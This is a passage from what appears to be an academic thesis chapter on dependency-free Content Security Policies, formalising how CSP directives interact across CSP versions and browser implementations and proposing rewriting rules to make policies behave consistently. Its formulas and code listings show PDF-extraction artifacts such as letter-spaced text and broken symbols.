different policies for different browsers, meaning that they do not deploy DF-CSP.

PUT(0,-845.90042)

56 CHAPTER 4. DEPENDENCY-FREE CSP

— we implement a new tool to assist developers in building effective policies. The tool

is meant to assist developers in building DF-CSP, or refactoring their policies in order

to make them DF-CSP. Since CSP is primarily meant to mitigate content injection

attacks, we start with rules that focus on scripts execution, then builds around them

in order to have a final CSP. Even though the refactored CSP could be different from

the original one, the rewriting rules do not introduce new vulnerabilities, as we put

the mitigation of malicious scripts execution at the core of these rules.

2 Context and problems

2.1 Directives and their values in different CSP versions

Directives in CSP versions

Table 4.1 present CSP directives and the version in which they have been initially in-

troduced. To start with, CSP1 [261] introduced 11 directives. Each directive targets a

specific type of content, and can thus be used to restrict the origins from which content of

the particular type can load from. For instance, the script-src directive specifies trusted

origins where scripts can be loaded from. The default-src is a directive used as a fall-

back for *-src directives (directives which names end with -src). When default-src is

present in a policy, and any of the directives which fallback to it is not specified, then the

missing directive implicitly inherit the restrictions (values) of default-src. The directive

helps for instance to apply the same restrictions on many directives at a time, without

explicitly specifying them. CSP2 [275] introduced some additional directives, in particular

child-src, to replace frame-src. Starting from this version, it is possible to set restric-

tions on trusted origins for form submission (form-action directive), origins of other web

applications allowed to embed another application as an iframe (frame-ancestors), ori-

gins of URLs that can be used as values for the <base> tag (base-uri). In this version, the

plugin-types directive has also been introduced. The plugin-types directive expresses

the types of plugins that the application trusts (PDF, Java applets, Adobe Flash plugins,

etc.). The trusted origins for plugins themselves are specified with object-src directive.

CSP3 [272], currently under development, introduces some changes w.r.t to CSP2. In par-

ticular, it splits the child-src directive into frame-src (for frames) and a new directive

worker-src (for workers), then deprecates child-src itself. The report-to directive has

also been introduced to replace report-uri. The manifest-src directive makes it possible

to specify the trusted origins of web applications manifests.

Directive values The semantics of the directive values (trusted origins) has evolved be-

tween previous versions and CSP3. In CSP1 and CSP2, insecure HTTP origins allow

content only from the exact origin. In CSP3, HTTP origin also allows content from its

secure HTTPS counterpart.

Nonces and hashes have been introduced in CSP2 to allow the whitelisting of individual

inline scripts and stylesheets, instead of using the ’unsafe-inline’ keyword which removes

any protection against attacks. Nonces can also be used to whitelist individual URLs. In

CSP2, a script is allowed to load if its origin is whitelisted in the policy, or if the script

has a valid nonce or hash. A major feature at the heart of CSP3 is the concept of trust

propagation to easily load dynamic scripts. This is achieved with the introduction of

the new ’strict-dynamic’ keyword to be used with the script-src directive. With

’strict-dynamic’, a script which is whitelisted with a nonce or a hash, is allowed to

further load any additional scripts even though such scripts are not explicitly whitelisted

in the policy. This has implications from a security perspective. If the following policy is

PUT(0,-845.90042)

2. CONTEXT AND PROBLEMS 57

deployed

scr i p t- s rc ’ n o n c e- a b c d ef ’ ’ s t r ic t - d y na m i c ’ ’ s e l f ’ https://

t ru s te d . c om ; o b j ec t -s r c ’n o n e ’ ;

— Browsers supporting CSP3, will enforce ’nonce-abcdef’ ’strict-dynamic’. An

attacker, who can control the URLs of dynamically injected scripts, can inject and

execute arbitrary script in the application, including from any attacker-controlled

origins. This is due to the use of ’strict-dynamic’, which enables scripts to load

any additional scripts they require.

— CSP2-compliant browsers will enforce ’nonce-abcdef’ ’self’. The attacker can

only inject content from the page own origin (’self’) which is anyway already trusted

since it is whitelisted in the CSP of the page. The attacker cannot inject arbitrary

script, as in the case of CSP3. Note that if we consider an attacker, who is able to

read the DOM, and therefore the nonces, then this attacker can also inject arbitrary

scripts as in the case of CSP3.

— Finally, in CSP1-compliant browsers, ’self’ will be enforced. As in the case of CSP2,

the attacker can only inject scripts from the page own origin (’self’). Therefore,

he cannot inject arbitrary script as in the case of CSP3.

Therefore, an attacker who manages to compromise a trusted script gains different power

in the content that he can further inject. As one can see, even though ’strict-dynamic’

eases CSP adoption by allowing to quickly load dynamic content, the attacker power in a

nonce-based policy (CSP3) is unlimited, compared to origin-based policies (CSP2, CSP1)

in which the attacker is bound by the explicit permissiveness of the policy.

2.2 Problems with browsers support

As mentioned in the introduction, browsers implementations can lead to different interpre-

tations of CSP.

The sandbox directive is not well supported in browsers We found no browser

correctly supporting the sandbox directive. We filed bugs to the vendors of all the browsers

we tested (Chrome 66, Chromium 60, Firefox 59, Opera 52, Safari 9.1.3). The sandbox

directive has been introduced in CSP1, to provide protected applications with the same

restrictions as the sandbox attribute for iframes in the HTML specification 2. Depending

on the presence or absence of its related flags, the sandbox directive alters the semantics

of many other directives. First of all, its mere presence in a CSP prevents plugins from

loading (object-src,plugin-types). By default, scripts execution (script-src), forms

submission (form-action) are also prevented, and the ’self’ keyword in directives does

not allow content from the page own origin, because the sandbox directive creates a unique

origin. Restrictions on scripts, forms and ’self’ can be relaxed if the allow-scripts,

allow-forms, and allow-same-origin flags (values) of the sandbox directive are specified

respectively.

All the browsers we have tested misimplemented the sandbox directive when it lacks the

allow-same-origin flag. In this situation, ’self’ must not match the page own origin. In

Firefox, Opera, Chromium, and Safari, ’self’ keyword in all directives would still match

the page own origin. In Chrome, only ’self’ in script-src will still match the page own

origin.

2. https://www.w3.org/TR/html50/embedded-content-0.html#attr-iframe- sandbox

PUT(0,-845.90042)

58 CHAPTER 4. DEPENDENCY-FREE CSP

Firefox does not support the plugin-types directive and other problems Firefox

does not support the plugin-types directive, that was introduced in CSP2. On Firefox

then, restrictions on the types of plugins will be ignored, therefore allowing all types of plu-

gins from origins whitelisted by the object-src directive the policy. CSP3 is still a working

draft, but Chrome, Opera and Firefox already implements some of its features, in partic-

ular, the ’strict-dynamic’ keyword. Nonetheless, we found and reported to Mozilla,

that the ’strict-dynamic’ keyword is ignored when it is specified in default-src. Since

’strict-dynamic’ is meant for the script-src directive, so directly adding it to the

script-src, or to default-src should result in the same effect, since default-src is

a fallback directive for script-src. Finally, IE Explorer 10 only supports the sandbox

directive, and not other CSP directives [21].

Flash plugins can load scripts Plugins extend browsers capabilities by allowing them

to render content which are not traditional HTML documents. Well known plugins are

Adobe Flash and Java Applets. It is well known that Flash plugins in particular can

execute scripts in the context of web applications. Therefore, in browsers which allow

Flash plugins, the restrictions set on scripts can be understood as those allowed by the

script-src and object-src directives, in case Flash plugins are allowed to execute. This

has been particularly demonstrated by Weichselbaum et al. [267]. However, while the

authors suggest that CSPs must not allow plugins, we rather argue that, plugins can be

allowed to load, even Flash plugins, as long as the object-src directive does not allow

more origins than the script-src directive. In this case, even though Flash plugins can

execute scripts, this is done from origins which are already allowed by the script-src

directive.

The fact that plugins can execute scripts also has an impact on workers (child-src,

worker-src) and connections (connect-src). In fact, connections and workers are all

JavaScript APIs that require script execution to be enabled before they can load. Hence,

in browsers not supporting Flash plugins, when (normal) scripts (script-src) cannot

execute, then workers cannot load either, and connections cannot be made. However, as

we have shown, if scripts are not allowed, while plugins are allowed, browsers supporting

Flash can still execute scripts, and consequently load workers or make connections to origins

that are whitelisted in CSP.

Scripts can load fonts Traditionally, fonts (font-src) are included in web applications

via the @font-face property of stylesheets (style-src). Hence, if stylesheets cannot load

(style-src ’none’), consequently fonts loading via stylesheets is not either allowed, even

though the font-src directive whitelists origins for loading fonts from. However, the W3C

is currently working on a API for allowing fonts to also be loaded via scripts (script-src,

and object-src because of Flash plugins). Known as CSS Font Loading API or FontFace

API [43], many browsers (Chrome, Firefox, Safari, Opera) already provide it for scripts to

load fonts. Hence, fonts can be loaded with stylesheets in all browsers and also via scripts

only in browsers supporting the FontFace API.

2.3 Goal: is my CSP effective?

CSP has 3 versions, and even when browsers support the same version, they provide dif-

ferent implementation of it. Moreover, CSP does not make it possible to deploy different

CSPs and clearly state to each browser, which one it should enforce, according to its im-

plementation and the version of CSP it supports. Rather, the policy which is deployed will

PUT(0,-845.90042)

3. DIRECTIVES DEPENDENCIES 59

be interpreted by different browsers according to their implementation and the version of

CSP. It is the responsibility of the developer to ensure that irrespective of the browser in

which her application will run, and which version of CSP it implements, the CSP deployed

will preserve the functionality of the application and effectively protect the application

against content injection attacks. This is a particularly daunting task, with regards to

the differences (and sometimes incompatibilities) in the semantics of CSP between CSP

versions, the versions that browsers support, and how well they support it.

Our goal is to address the challenges in deploying backwards compatible and effective

CSPs, considering the differences and incompatibilities of semantics between CSP ver-

sions, browsers supports and implementations. We propose tools to assist in building and

enforcing such policies.

To address the semantics challenges, we introduce the concept of CSP directives depen-

dencies, and dependency-free policies (DF-CSP). By directives dependencies, we formalize

the differences in semantics, the relations and influences between directives and their val-

ues, considering the different versions of the specification, and browsers implementations.

Then, we introduce a rewriter, and a set of rules for resolving dependencies. We prove

that the rewriter successfully produces dependency-free policies. These are policies which

semantics are preserved accross different CSP versions and browsers implementations. We

also discuss the security of CSP and DF-CSP, especially in presence of ’strict-dynamic’

in the script-src directive. While the use of this keyword eases CSP adoption by allowing

to load dynamic scripts, it also gives an attacker unlimited power in case he can control

the URLs of dynamically injected scripts. We demonstrate that deploying 2 policies limits

an attacker power, even in case of a compromise of a trusted script.

3 Directives dependencies

In this section, we identify and formalize the different dependencies between directives. We

consider 3 scenarios. First of all, to be comprehensive, we consider all the 3 CSP versions

and their current implementations in browsers as we know of them. In a second scenario,

we consider only CSP2 and CSP3, which are widely supported by major browsers. Finally,

we consider CSP2 and CSP3 according to their specifications only, without considering the

different browsers implementations.

3.1 CSP core syntax

For formalization purposes, we provide a CSP core syntax that represent a core of all three

CSP versions. For the sake of simplicity, we consider only well-formed policies, which is

defined below. Dealing with well-formed helps us to abstract from the complexity of CSP

syntax. Finally, we define a directive lookup operator which given a policy, and a directive

name, returns its set of values (i.e trusted origins associated to script-src directive if

specified in a policy).

We borrow some of the notation and terms from a formalization of the semantics of CSP2

provided by Calzavara et al. [179]. However, in many cases the definitions of the concepts

differed because the scope of our work is different from theirs. While they studied the

semantics of individual directive values, we are interested in the global meaning of CSP,

and the dependencies between directives themselves. Understanding the global meaning

of CSP and resolving directives dependencies is useful prior to accurately analyzing the

formal semantics of CSP as done in [179].

The core CSP syntax is shown in Table 4.2. This syntax is sufficient to illustrate our

PUT(0,-845.90042)

60 CHAPTER 4. DEPENDENCY-FREE CSP

formalization.

Source expressions se ::= https:|’self’|...

Directive name t::= script-src|object-src|...

Directive values v::= {se1, ..., sen}|{’none’}

Directive d::= t v

Policy p::= −→

Table 4.2 – CSP Core Syntax

A CSP policy pis a set of directives −→

d. CSP directives are all predefined, and include

for instance script-src,object-src,img-src. (See also Table 4.1). Directives values

are a set of source expressions sei, that depend on the type of directive. They include ori-

gins (e.g. https://trusted.com, trusted.com, *.trusted.com), schemes (e.g. https:),

keywords (e.g. ’self’,’none’,allow-scripts). The special value {’none’}means that

the directive does not allow any content. The special directive default-src is a fallback

for many other directives (script-src,img-src,object-src,connect-src, ...). In other

words, when a directive that falls back to default-src is not specified in a policy, its

values resolve to the default-src directive values. We assume that there is a set fdof

directives that fallback to default-src.

Well-formed policies

By well-formed policies, we mean policies which:

— contain only known directives, given in the specification. In reality, nothing prevents

a policy from including unknown directives. They will be ignored by browsers when

the policy is enforced. We also consider only directives that set restrictions on the

origins where content can be loaded from. This explains why we do not consider the

disown-opener directive of CSP3 for instance [272].

— directives values are only those allowed by the specification. In practice, directive

values which are not known will be ignored by browsers when enforcing the policy.

For the sake of simplicity, we do not model nonces and hashes in the formalization, as

they can refer to content from an arbitrary origin. This is difficult to reason about, in

particular it is impossible to statically compare the restrictions on 2 directives which

uses nonces or hashes, without any information on the content they will be referring

to at runtime.

— directives are not duplicated. The specification makes it possible to have a directive

repeated multiple times within a single policy. In this case, browsers will consider

only the first instance of the directive and its related values. Other occurrences will

be ignored.

— policies are not a conjunction of multiple policies. The specification allows to specify

more than one policy to be enforced. In practice, browsers will enforce both of them,

but separately. In this case, content should be allowed by both policies, in order to

load in an application.

— directives values are expanded to accommodate the modifications introduced by

CSP3, in particular that insecure origins also match their secure counterparts. CSP3

enforcement allows secure counterparts of insecure origins. For instance, the origin

http://example.com allows both content from http://example.com and https:

//example.com.

PUT(0,-845.90042)

3. DIRECTIVES DEPENDENCIES 61

— directive values are not redundant. For instance, a directive with *.example.com*.

sub.example.com as values, presents redundancies. This is because *.sub.example.

com is already allowed by *.example.com.

We assume the existence of a function for building well-formed policies. In practice, we

have provided an implementation of such a function (see Section 5).

Lookup operator

We define a lookup operator which, given a policy and a directive, returns the allowed

values corresponding to that individual directive only.

Definition 1 (Lookup).Given a policy expressed with a list of directives −→

d; and ta

directive name, the lookup operator −→

d↓tis defined as follows:

−→

d↓t=











vif t v ∈−→

vif default-src v∈−→

d∧t∈fd

∅if t∈ {plugin-types,sandbox}

{∗} otherwise

When a directive is present, the lookup operator returns its set of values as defined in the

policy. Otherwise, if the default-src directive is present in the policy, and the directive

being looked up falls back to default-src, then it returns the default-src directive

values. If none of the two cases is true, then no particular restrictions are set on the

directive. We resolve the value of the missing directive to a special value depending on the

type of directive:

—∅means that the directive is missing in the policy (possible cases are plugin-types

or sandbox directive).

—{∗} is a special value that means any content is allowed. It is returned when the

missing directive allows content of a certain type (scripts, images, stylesheets). These

are basically directives that may fallback to default-src (if default-src is present

in −→

d), in addition to form-action,frame-ancestors, and base-uri.

We distinguish plugin-types and sandbox from other directives first because the values

of the directives plugin-types and sandbox are only composed with keywords such as

allow-same-origin,application/pdf, while other directives values can also be origins.

Additionally, the other directives can be present in a policy with {*} as a value to mean

that they allow content of any type. In other words, to express that for instance images are

allowed from any origin, one can either omit the img-src directive (and the default-src

directive) from a policy or add the img-src directive (or the default-src directive) in the

policy by setting its value to {*}.

However, the only way to allow any type of plugins is to omit the plugin-types directive

because there is no special value like {*} to be set to the plugin-types directive in a policy

in order to allow plugins of any type. Similarly, once the sandbox directive is used in a

policy, there is no special value like {*} to relax all the restrictions of the directive. As a

matter of fact, if allow-scripts renable scripts that the sandbox directive had prevent,

there is no similar flag to renable plugins once the sandbox directive is used, apart from

removing it from a policy.

PUT(0,-845.90042)

62 CHAPTER 4. DEPENDENCY-FREE CSP

(D1)∀t∈ {frame-ancestors,base-uri,manifest-src}, v =−→

d↓t⇒v={∗}

(D2)sandbox v∈−→

d∧v0=−→

d↓object-src ⇒v0={’none’}

(D3)sandbox v∈−→

d∧allow-scripts /∈v∧v0=−→

d↓script-src ⇒v0={’none’}

(D4)v0=−→

d↓form-action ⇒(sandbox v∈−→

d∧allow-forms /∈v∧v0={’none’})

∨(((sandbox v∈−→

d∧allow-forms ∈v)∨sandbox v /∈−→

d)∧v0={∗})

(D5)sandbox v∈−→

d∧allow-same-origin /∈v⇒ ∀t v0∈−→

d , ’self’ /∈v0

(D6)v=−→

d↓frame-src ∧v0=−→

d↓child-src ⇒v=v0

(D7)v=−→

d↓script-src ∧v0=−→

d↓child-src ∧v00 =−→

d↓worker-src ⇒v=v0∧v=v00

(D8)plugin-types v∈−→

d∧v0=−→

d↓object-src ⇒v0={’none’}

(D9)v=−→

d↓object-src ∧v0=−→

d↓script-src ⇒v−v0={}

(D10)v=−→

d↓script-src, v0=−→

d↓object-src. v ={’none’} ⇒ v0={’none’}

∨(∀t∈ {connect-src,child-src,worker-src}, v00 =−→

d↓t∧v00 ={’none’})

(D11)v=−→

d↓style-src, v0=−→

d↓font-src. v ={’none’} ⇒ v0={’none’}

∨(∀t∈ {script-src,object-src}, v00 =−→

d↓t∧v00 ={’none’})

Table 4.3 – Formalization of Dependency-Free Policies (DF-CSP) considering CSP1, CSP2

and CSP3 versions and their implementations in browsers.

3.2 Formalization of DF-CSP considering CSP1, CSP2, CSP3 and browsers

implementations

Table 4.3, which is explained in the following subsections, shows a formalization of suf-

ficient conditions for CSP policies to be directive dependency free. Symbols ∈,6∈, and

⇒,∧,∀are standard and have the usual meanings of set inclusion operators and logical

implication, conjunction, and quantification. Using the conditions of Table 4.3, we can

define a dependency-free policy (DF-CSP). Intuitively, a policy is dependency-free when all

the rules D1, ..., D11 hold.

Definition 2 (DF-CSP).A policy −→

dis dependency-free (DF-CSP) iff ∀i∈ {1, ..., 11}, Di

holds.

The table implicitly defines dependencies: there is a dependency between directives in a

CSP policy −→

dwhen a condition Didoes not hold. For example, D9states that there is

a dependency between object-src and script-src if the object-src directive is more

permissive than the script-src directive.

We classify the dependencies in 4 categories. Backwards incompatible directives are those

which do not have an equivalent directive in other versions of the specification. For instance,

form-action was introduced in CSP starting from CSP2, and is therefore not known in

CSP1. We then provide the semantics of the sandbox directive as it should be implemented

by browsers. Then, we turn to directives which in different CSP versions have different

meanings, and content types which in different versions of the specification are governed

by different directives. Finally, we discuss dependencies due to browsers implementations

of CSP, APIs they provide, and their influence on the semantics of a policy.

Backwards incompatible directives

This concerns directives which are only known in a specific version of CSP specification,

and do not have any equivalence in other versions. When these directives are present

in a policy, they will be enforced only in the versions of CSP in which they are known.

PUT(0,-845.90042)

3. DIRECTIVES DEPENDENCIES 63

In other versions, they will be ignored, leading to a different semantics. This includes,

frame-ancestors, and base-uri which where introduced in CSP2, and manifest-src

which is newly introduced in CSP33.

Ignoring a directive is equivalent to having it allow every content. So the values of directives

frame-ancestors,base-uri, and manifest-src must always resolve to {∗} in order for

a policy to be dependency-free. This is formalized as D1. It is worth noting that the

manifest-src directive is a special case. In fact, it falls back to default-src. Hence,

even when it is not specified in a policy, then if the default-src directive is present, the

value of default-src should be {∗}, otherwise the policy is not DF-CSP.

frame-ancestors ’ s el f ’ t ru s te d . c om ;

Listing 4.1 – D1problem: in CSP1, the page can be embedded by untrusted.com, in

spite of CSP

The policy in the example above contains a dependency because the directive frame-ancestors

is not backwards compatible. The directive will be ignored in CSP1. Only CSP2 and CSP3

will correctly enforce it.

Semantics of the sandbox directive

When the sandbox directive is present in a policy, it automatically prevents plugins from

loading, no matter the restrictions set on the plugins directive (object-src). This is

formalized as D2. Scripts execution (script-src) and forms submission (form-action) are

also prevented when the sandbox directive is present, and does not include allow-scripts

and allow-forms in its values set. These are formalized as D3and D4respectively. Finally,

when the sandbox directive is present, and allow-same-origin is not in its values set, the

’self’ keyword present in other directives is ignored. We formalize this as D5. It is

worth mentioning the case of forms submission directive form-action. It has only been

introduced in CSP2. As formalized by D4, in a DF-CSP, form submission can be disallowed

(by not including allow-forms in sandbox). Otherwise if the sandbox directive includes

allow-forms or is not present, then the form submission directive (form-action) should

be treated as the backwards-incompatible directives discussed in the previous paragraph:

it must allow any origin ({∗}), otherwise the policy is not DF-CSP. This is because the

directive is not supported in CSP1. Below is an example of a policy with dependencies

related to the sandbox directive.

sandbox a ll o w- s cr i pt s a ll o w- fo r ms ;

scr i p t- s rc ’ s e lf ’ t r us t ed . c om ;

form-action ’ s el f ’ t ru s te d . c om ;

obj e c t- s rc ’ s e lf ’ t r us t ed . c om ;

Listing 4.2 – D2, D3, D4, D5problems: sandbox alters the semantics of other directives.

Disregarding the sandbox directive, this policy allows scripts, plugins and forms submis-

sion to the page own origin (’self’) and trusted.com. Now considering the policy as

a whole, the presence of the sandbox directive no longer allows plugins. The absence of

the allow-same-origin in sandbox values set, creates a unique origin. Unique origins are

incomparable to any other origin [76]. Therefore, a unique origin does not match ’self’,

the origin of a webpage where a policy is enforced [261,272,275]. Therefore even though the

sandbox directive allows scripts and forms (allow-scripts and allow-forms), requests to

3. Note that plugin-types and form-action directives are also backwards incompatible directives, but

we discuss them in different categories of dependencies, because the former is not supported in Firefox,

and the latter is related to the sandbox directive

PUT(0,-845.90042)

64 CHAPTER 4. DEPENDENCY-FREE CSP

load scripts or submit forms can only be made to trusted.com, and not to the page own

origin, despite the presence of ’self’ in the values of these 2 directives. Many browsers

we have tested would still allow content from the page own origin, some allow only scripts,

and others allow any type of content (scripts, forms, etc.). Additionally, the form-action

directive is not known in CSP1, and will be ignored in this version, as is the case for

backwards incompatible directives (See Section 3.2), leading to differences in semantics.

Different directives, different meanings

When specific directives are used in different versions of CSP for a single content type, set-

ting different restrictions on these directives results in different restrictions being enforced

for the same content type, depending on the version of the specification under consider-

ation. This is the case for frames (D6) and workers (D7). In CSP1 and CSP3, frames

are specified with the frame-src directive, while in CSP2, the child-src is used instead.

The directives script-src,child-src, and worker-src are used to specify restrictions

on workers in CSP1, CSP2 and CSP3 respectively. D6checks that restrictions on frames

directives (frame-src,child-src) are the same, and D7that the restrictions on workers

directives (script-src,child-src,worker-src) are also the same4. Otherwise the policy

is not DF-CSP. The following Listing 4.3 shows a non-DF-CSP due to frames and workers.

scr i p t- s rc t r us t ed . c om b lo b : ;

fra m e -s r c ’s e l f ’ ;

wor k e r- s rc ’ s e lf ’ ;

Listing 4.3 – D6, D7problems: in CSP2, workers and frames can be loaded from any

domain, in spite of CSP

Workers are concerned with script-src,child-src, and worker-src directives in CSP1,

CSP2 and CSP3 respectively. Workers can be loaded from trusted.com in CSP1, any

domain in CSP2 (because child-src is missing), and the page own origin in CSP3. Frames

are concerned with frame-src (CSP1, CSP3) and child-src (CSP2) directives. Therefore

in CSP1 and CSP3, frames can load only from the page own origin, while in CSP2 they

can load from any origin (because child-src directive is missing).

Browser specific APIs

We consider the following CSP in order to specify dependencies due to browser specific

APIs.

scr i p t- s rc ’ s e lf ’ ;

obj e c t- s rc t r us t ed . c om ;

sty l e -s r c ’n o n e ’ ;

plugin-types a pp l i ca t i on / p d f ;

Listing 4.4 – D8, D9, D10, D11 problems: plugins can load scripts and scripts can load

fonts, in spite of CSP

The plugin-types directive The plugin-types directive is not part of CSP1. More-

over, it is not supported in Firefox, which otherwise supports other directives of CSP2 and

some features of CSP3. So Firefox and CSP1-compliant browsers will ignore this directive,

meaning they will always allow any type of plugins to load from all origins specified in

4. In practice, only same origin or blob workers are allowed. Therefore, it would have been sufficient to

ensure that the effective restrictions on workers (page origin and/or blob) are equal in the three directives

PUT(0,-845.90042)

3. DIRECTIVES DEPENDENCIES 65

the plugins directive (object-src). According to the specification [272,275], when the

plugin-types directive is present in a policy, it further restricts plugins (object-src),

by specifying precisely which types of plugins are allowed in an application (PDF, Java,

Adobe Flash, etc.). Unfortunately, it is not possible to include plugin-types directive in

a policy, to allow any type of plugin (there is not a default value which resolves to all

types of plugins, as in the case for instance for {*}, which in a directive such as img-src,

would allow images from all origins). Hence, when this directive is used in a policy, plugins

(object-src) should not be allowed, otherwise the policy is not DF-CSP. This is expressed

as D8. Listing 4.4 shows an example of a non dependency-free policy because of D8.

According to this policy, in browsers such as Chrome, Opera, only PDF documents are

allowed as plugins, while in Firefox and CSP1-compliant browsers, any type of plugin can

load, because these browsers do not support the plugin-types directive.

Loading Scripts via Flash Plugins In CSP, the script-src directive normally re-

stricts the origins of scripts, and object-src restricts the origins of plugins. However,

Flash plugins can also execute scripts. So, scripts execution in an application concerns

both script-src as well as object-src (when Flash plugins can execute). By default,

Firefox does not allow the execution of Flash plugins. Users requiring Flash plugins have

to manually install Adobe Flash Reader to do so. Thus, for users who do not install Flash

in their browsers, scripts execution is limited to script-src directive only, while in other

browsers, the Flash plugins allowed by the object-src, can also execute scripts. As long

as object-src directive only allows origins which are already permitted by script-src

directive, then, even though Flash plugins can load (allowing them to execute scripts), the

policy is DF-CSP. This is because (normal) scripts are allowed to load from the same origins.

This is formalized as D9. The object-src directive should not allow origins which are not

already allowed by the script-src (See Listing 4.4 for an example). This is different from

the suggestion of Weichselbaum et al. [267] that one must always prevent plugins in a pol-

icy. We rather safely argue that, plugins can be allowed to load, even Flash plugins, as long

as the object-src directive does not allow more origins than the script-src directive.

In this case, even though Flash plugins can load scripts, this is done from origins that are

already allowed by the script-src directive.

Workers and connections depends on scripts execution Workers and connections

are JavaScript APIs [12,128,150], and can only load when scripts execution is enabled. In

browsers where plugins cannot execute scripts, if normal scripts (script-src) cannot load,

then workers cannot load either, no matter the origins whitelisted in their related directives.

However, in browsers where plugins can also execute scripts, it is not sufficient that normal

scripts execution is not allowed to consequently prevent workers or connections. If plugins

are allowed, workers can also load and connections can be made, leading to a different

semantics, depending on the browser under consideration. Therefore, when normal scripts

execution is not enabled, one has to ensure that either plugins cannot load, or loading

workers and making connections is explicitly not allowed. This is expressed as D10, and

Listing 4.4 shows an example.

Fonts depends on stylesheets and also scripts execution Traditionally, fonts were

loaded via stylesheets (style-src). But with the introduction of the CSS Font Loading

API [43], already supported by major browsers, fonts can also be loaded via script execu-

tion. So, in browsers not supporting the API, when stylesheets cannot be loaded, fonts

cannot be loaded either. However, in browsers supporting the API, if scripts execution

PUT(0,-845.90042)

66 CHAPTER 4. DEPENDENCY-FREE CSP

(R1)∀t∈ {frame-ancestors,base-uri,manifest-src},if −→

d↓t6={∗} then −→

d↓t={∗}

(R2)if sandbox v∈−→

dthen −→

d↓object-src ={’none’}

(R3)if sandbox v∈−→

dand allow-scripts /∈v, then −→

d↓script-src ={’none’}

(R4)if sandbox v∈−→

dand allow-forms /∈v, then −→

d↓form-action ={’none’}else

−→

d↓form-action ={∗}

(R5)if sandbox v∈−→

dand allow-same-origin /∈v, then ∀t v ∈−→

d , −→

d↓t=v− {’self’}

(R6)T={frame-src,child-src}, t1, t2∈T, v1=−→

d↓t1and v2=−→

d↓t2.∀t∈T, −→

d↓t=v1∪v2

(R7)T={script-src,child-src,worker-src}, t1, t2, t3∈T,

v1=−→

d↓t1and v2=−→

d↓t2and v3=−→

d↓t3.∀t∈T, −→

d↓t=v1∪v2∪v3

(R8)if plugin-types v∈−→

dthen −→

d↓plugin-types =∅or −→

d↓object-src ={’none’}

(R9)o=object-src, s =script-src, T ={o, s}, v1=−→

d↓o and v2=−→

d↓s.

−→

d↓o={’none’}or −→

d↓o=v1∩v2or ∀t∈T, −→

d↓t=v1∪v2

(R10)v=−→

d↓script-src.if v={’none’}then −→

d↓object-src ={’none’}or

∀t∈ {connect-src,child-src,worker-src},−→

d↓t={’none’}

(R11)v=−→

d↓style-src.if v={’none’}then −→

d↓font-src ={’none’}or

∀t∈ {script-src,object-src},−→

d↓t={’none’}

Table 4.4 – Rewriting Rules

is enabled, fonts can also be loaded even though stylesheets cannot be loaded. This is

expressed with D11. Therefore, when stylesheets cannot be loaded, one has to ensure that

fonts cannot be loaded either (i.e fonts or scripts execution are explicitly not allowed by

the CSP policy). An example is given in Listing 4.4.

3.3 Rewriter for building DF-CSP for CSP1, CSP2, and CSP3

The goal of the rewriter is to transform a CSP policy into a DF-CSP. The rules are presented

in Table 4.4. Each rewriting rule Riresolves a related dependency Diof the same number.

Intuitively, each rewriting rule Riapplies a set of guidelines and modifications to a policy,

in order to make the condition Dihold. Now, we prove that each rewriting rule effectively

resolves the related dependency.

The rules are meant for developers willing to build or refactor policies to be equally enforced

in different browsers.

(R1) Applying R1results in removing any restrictions on directives frame-ancestors,

base-uri, and manifest-src. For frame-ancestors and base-uri directives, one can

simply remove them from the policy. If the default-src, is not specified, one can also

remove the manifest-src directive from the policy. Otherwise, one has to explicitly add

it to the policy, setting its values to {*}. This basically means that no restrictions are set

on the directive. R1ensures that no restrictions are set on directives frame-ancestors,

base-uri, and manifest-src, thereby making D1to hold.

(R2) When the sandbox directive is present in a policy, R2sets the object-src directives

values to {’none’}. This is exactly the semantics of the sandbox directive regarding plugins

as stated in HTML5 standard [70]. This makes D2holds.

(R3) When the sandbox directive is present, while not specifying allow-scripts in its

values, then scripts execution is not allowed. R3changes the script-src directive to

{’none’}. This makes D3hold.

(R4) Similarly, when the sandbox directive is present, while not specifying allow-forms,

PUT(0,-845.90042)

3. DIRECTIVES DEPENDENCIES 67

then forms submission is not allowed. R4sets the form-action directive to {’none’}.

Otherwise, forms submission must be allowed to any origin, because the directive is ignored

in CSP1. In this case R4sets the form-action directive values to {*}. Either of these

rewriting make D4to hold.

(R5) The absence of the allow-same-origin in the sandbox directive results in a mismatch

between ’self’ and a page own origin. This is is equivalent to not having the ’self’

keyword in any directive. To do so, R5removes this keyword from any directive values

where it is found, making D5to hold.

(R6)frame-src, and child-src directives both concern frames inclusion. R6rewrites

them so that they have the same restrictions. Either both directives are set to the values

of one of them, or to the union of the values of both of them. In any case, the result is

that they will have the same values, which makes D6hold.

(R7) Similarly, script-src,child-src, and worker-src directives concern workers. R7

rewrites these directives so that they have the same values. All directives can either be

assigned the values of one of them, or the union of the values of 2 of them, or the union of

the values of all the 3 directives. In any case, these rewriting make D7hold.

(R8) Since plugin-types directive is not supported in all browsers, when it is present

in a policy, R8either removes it (−→

d↓plugin-types =∅means that the plugin-types

is not present (removed) from the policy (See Section 3.1 for more details), or it sets the

object-src directive to {’none’}. Either of the rewriting makes D8hold. As with the case

of directives not being backwards compatible, it is recommended not to use plugin-types

in DF-CSP, as it leads to different semantics.

(R9) Plugins directive object-src should not be more permissive than script-src di-

rective. To so do, R9either sets object-src directive to {’none’} or to the intersection

of object-src and script-src. Otherwise it assigns both directives the union of their

respective values. All these rewriting ensures that object-src is not more permissive than

script-src.

(R10) When scripts are not allowed and if connections, workers and plugins are allowed,

then connections can be made and workers can load in browsers allowing script execution

via plugins, while in others, this will not be the case. So, when scripts are not allowed,

R10 rewrites the policy so as to prevent plugins, or connections and workers. This makes

D10 hold.

(R11) When stylesheets are not allowed while fonts are still allowed, if scripts execution

is allowed (either via script-src or object-src), then fonts can still load via scripts

execution in browsers supporting the CSS Font Loading API [43]. To make D11 hold, R11

rewrites the policy so as to prevent fonts from loading, or to prevent scripts execution.

3.4 Resolving all Dependencies

Applying the rules in any order leads to a policy not being DF-CSP, because of conflicts

between them. Conflicts arise between 2 rules when both of them modify the same directive.

Below are the directives whose modifications introduce conflicts.

object-src R2, R8, R9, R10, R11

script-src R3, R7, R9, R10, R11

child-src R6, R7, R10

worker-src R7, R10

A rule of thumb when applying these rules is that a directive value should not change twice.

Considering child-src, if R6modifies its value to v, while R7modifies it to another value

v0different from v, then R7reintroduces in the policy the dependency D6that R6has just

resolved. When a directive is modified, then it is better to fix its value, and no longer alter

PUT(0,-845.90042)

68 CHAPTER 4. DEPENDENCY-FREE CSP

it in subsequent rewriting rules, in order to avoid entering into infinite loops, and not being

able to make the policy DF-CSP.

Since content injection attacks in web applications is done through scripts execution, then

